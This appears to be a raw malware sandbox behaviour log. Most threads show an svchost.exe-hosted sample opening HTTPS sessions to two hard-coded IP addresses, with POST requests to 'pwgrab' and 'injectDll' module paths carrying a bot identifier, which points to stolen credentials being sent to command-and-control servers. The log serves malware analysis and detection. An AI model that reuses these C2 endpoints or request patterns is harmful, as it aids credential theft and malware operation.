Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	20	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	31	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	20	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	31	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	23	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	24	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268452748, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24180476, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268456544, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268452748, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268456556, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268456544, size = 127	1	Fn Data

Thread 0xa38

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 51.77.92.215, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11035760	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/VERS/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BB0CF0 Content-Length: 139 , url = 51.77.92.215/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/VERS/browser/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0x738

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 51.77.92.215, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 51.77.92.215/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0x510

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 51.77.92.215, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11047491	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BB3AC3 Content-Length: 151 , url = 51.77.92.215/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xc18

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 51.77.92.215, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11050455	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BB4657 Content-Length: 127 , url = 51.77.92.215/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0x308

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11053606	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BB52A6 Content-Length: 153 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0x20c

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11053606	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BB52A6 Content-Length: 129 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0x150

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11053606	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BB52A6 Content-Length: 132 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0x754

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11057319	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BB6127 Content-Length: 149 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xd18

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11063653	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BB79E5 Content-Length: 129 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xd0c

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11063653	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BB79E5 Content-Length: 129 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xd08

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11063653	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BB79E5 Content-Length: 129 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xd20

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11064339	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BB7C93 Content-Length: 136 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xd10

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11064370	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BB7CB2 Content-Length: 132 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xd2c

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0x658

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0x810

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11067724	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BB89CC Content-Length: 160 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xd34

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xb84

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xb88

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11068504	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BB8CD8 Content-Length: 167 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xa2c

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xa40

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
